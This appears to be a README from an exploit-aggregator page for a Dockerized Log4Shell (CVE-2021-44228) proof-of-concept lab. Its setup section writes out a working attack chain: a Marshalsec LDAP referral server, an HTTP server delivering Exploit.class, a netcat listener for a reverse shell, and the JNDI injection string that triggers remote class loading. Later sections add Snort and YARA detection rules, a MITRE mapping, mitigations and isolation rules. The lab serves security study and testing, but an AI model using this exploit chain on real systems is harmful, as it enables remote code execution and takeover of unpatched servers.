Share
## https://sploitus.com/exploit?id=A6581FDE-66FA-5D7B-B997-90B2E616E9DD
```markdown
โ–ˆโ–ˆโ•—      โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—  โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•—  โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•—  โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•—     โ–ˆโ–ˆโ•—         โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—  โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—  โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—
โ–ˆโ–ˆโ•‘     โ–ˆโ–ˆโ•”โ•โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•”โ•โ•โ•โ•โ• โ–ˆโ–ˆโ•‘  โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ•โ•โ•โ•โ–ˆโ–ˆโ•‘  โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ•โ•โ•โ•โ–ˆโ–ˆโ•‘     โ–ˆโ–ˆโ•‘         โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•”โ•โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•”โ•โ•โ•โ•โ•
โ–ˆโ–ˆโ•‘     โ–ˆโ–ˆโ•‘   โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘  โ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—  โ–ˆโ–ˆโ•‘     โ–ˆโ–ˆโ•‘         โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•‘   โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘     
โ–ˆโ–ˆโ•‘     โ–ˆโ–ˆโ•‘   โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘   โ–ˆโ–ˆโ•‘โ•šโ•โ•โ•โ•โ–ˆโ–ˆโ•‘โ•šโ•โ•โ•โ•โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ•โ•  โ–ˆโ–ˆโ•‘     โ–ˆโ–ˆโ•‘         โ–ˆโ–ˆโ•”โ•โ•โ•โ• โ–ˆโ–ˆโ•‘   โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘     
โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ•šโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ•šโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•     โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘  โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—    โ–ˆโ–ˆโ•‘     โ•šโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ•šโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•
โ•šโ•โ•โ•โ•โ•โ•โ• โ•šโ•โ•โ•โ•โ•โ•  โ•šโ•โ•โ•โ•โ•โ•      โ•šโ•โ•โ•šโ•โ•โ•โ•โ•โ•โ•โ•šโ•โ•  โ•šโ•โ•โ•šโ•โ•โ•โ•โ•โ•โ•โ•šโ•โ•โ•โ•โ•โ•โ•โ•šโ•โ•โ•โ•โ•โ•โ•    โ•šโ•โ•      โ•šโ•โ•โ•โ•โ•โ•  โ•šโ•โ•โ•โ•โ•โ•

             โšก LOG4SHELL (CVE-2021-44228) PoC LAB
              [ PROOF OF CONCEPT & JNDI EXPLOITATION ]

```

**Log4Shell PoC is a high-fidelity exploitation environment designed to replicate the CVE-2021-44228 vulnerability.** It provides a containerized sandbox to demonstrate JNDI injection, LDAP/RMI referral redirection, and remote code execution (RCE) via the Log4j 2 library.

---

### โš ๏ธ DISCLAIMER

**For Educational and Authorized Security Testing Purposes Only.**

The use of this Proof of Concept for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state, and federal laws. The authors assume no liability and are not responsible for any data loss, system damage, legal consequences, or misuse caused by this program. By using this software, you agree to operate within the legal boundaries of your jurisdiction.

---



---

### Section 2: Project Capabilities and Structure


## ๐Ÿš€ PoC Capabilities

* [x] **JNDI Injection:** Vulnerable Log4j 2.14.1 entry point.
* [x] **LDAP Referral Server:** Malicious LDAP redirection via Marshalsec.
* [x] **Remote Class Loading:** HTTP delivery of compiled Java bytecode.
* [x] **Multi-Stage Payload:** Java-native reverse shell execution.
* [x] **Evasion Testing:** TrustURLCodebase and FormatMsgNoLookups bypasses.

---

## ๐Ÿ›  PoC Structure

### ๐Ÿ›ฐ Malicious Infrastructure (Attacker)
The attacker's side consists of three distinct channels to facilitate the PoC.
* **LDAP Redirector (Port 1389):** Built on Marshalsec, this directs the victim's JNDI request to the hosted exploit.
* **HTTP Payload Server (Port 8888):** Hosts the `Exploit.class` bytecode for the victim to download and execute.
* **NC Listener (Port 9001):** The final callback destination for the reverse shell.

### ๐Ÿ’ป Vulnerable Instance (Victim)
A Dockerized OpenJDK 8 environment running a vulnerable Log4j implementation.
* **Log4j v2.14.1:** The targeted library version.
* **VulnerableLog.java:** A simple Java application that logs user-supplied input without sanitization.

---



---

### Section 3: Setup & Execution Instructions


## โš™๏ธ Setup & Execution

### 1. Attacker Setup (Arch Linux)

**Tab 1: LDAP Referral Server**
```bash
docker run --rm -it -p 1389:1389 maven:3.8.6-openjdk-8 /bin/bash -c "
git clone [https://github.com/mbechler/marshalsec.git](https://github.com/mbechler/marshalsec.git) && \
cd marshalsec && \
mvn clean package -DskipTests && \
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer '[http://172.17.0.1:8888/#Exploit](http://172.17.0.1:8888/#Exploit)' 1389"

```

**Tab 2: HTTP Payload Delivery**

```bash
# Start Python server in the directory containing Exploit.class
python3 -m http.server --bind 0.0.0.0 8888

```

**Tab 3: Netcat Listener**

```bash
nc -lvnp 9001

```

### 2. Victim Execution

**Tab 4: Launch Vulnerable Container**

```bash
docker run --rm -it -v $(pwd):/app -w /app openjdk:8u121-jdk-alpine /bin/sh

```

**Inside the Container: Trigger the PoC**

```bash
java -Dlog4j2.formatMsgNoLookups=false \
     -Dcom.sun.jndi.ldap.object.trustURLCodebase=true \
     -cp ".:log4j-api-2.14.1.jar:log4j-core-2.14.1.jar" \
     VulnerableLog '${jndi:ldap://172.17.0.1:1389/Exploit}'

```

---



---

### Section 4: Detection and Mitigation


## ๐Ÿ” Detection & Defensive Monitoring

### 1. Network Detection (Snort/Suricata)
```snort
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET EXPLOIT Possible Log4j RCE Attempt (jndi)"; content:"jndi|3a|"; nocase; sid:2034647; rev:1;)

```

### 2. Log-Based Detection (YARA)

```yara
rule Log4Shell_PoC_JNDI {
    meta:
        description = "Detects JNDI lookup strings in logs used in PoC"
        author = "Apex Pro Framework"
    strings:
        $jndi = / \$\{jndi:(ldap|rmi|dns|nis|iiop|corba|lds):/ i
        $obfuscated = /\$\{\$\{[^}]+\}ndi:/ i
    condition:
        any of them
}

```

## ๐Ÿ›ก Incident Response (IR) Matrix

| Phase | Technique | Alert Triggered? | MITRE ATT&CK |
| --- | --- | --- | --- |
| **Initial Access** | Exploit Public-Facing App | [ ] | T1190 |
| **Execution** | Command and Scripting Interpreter | [ ] | T1059 |
| **Command & Control** | Application Layer Protocol (LDAP) | [ ] | T1071.003 |
| **Exfiltration** | Non-Application Layer Protocol | [ ] | T1048 |

---

## ๐Ÿ”’ Mitigation & Hardening

1. **Update:** Update to Log4j **2.17.1** or higher.
2. **JVM Flag:** Set `-Dlog4j2.formatMsgNoLookups=true` to disable lookups.
3. **Class Removal:** Manually remove `JndiLookup.class` from the `log4j-core` JAR.

---

## ๐Ÿ”’ Rules of Engagement

1. **Isolation:** Hard-code target IPs to internal Docker bridge (`172.17.0.0/16`).
2. **Networking:** Ensure Host-Only/Internal VM networking ONLY.
3. **C2 Security:** Do not expose the Python or LDAP servers to the public internet.

---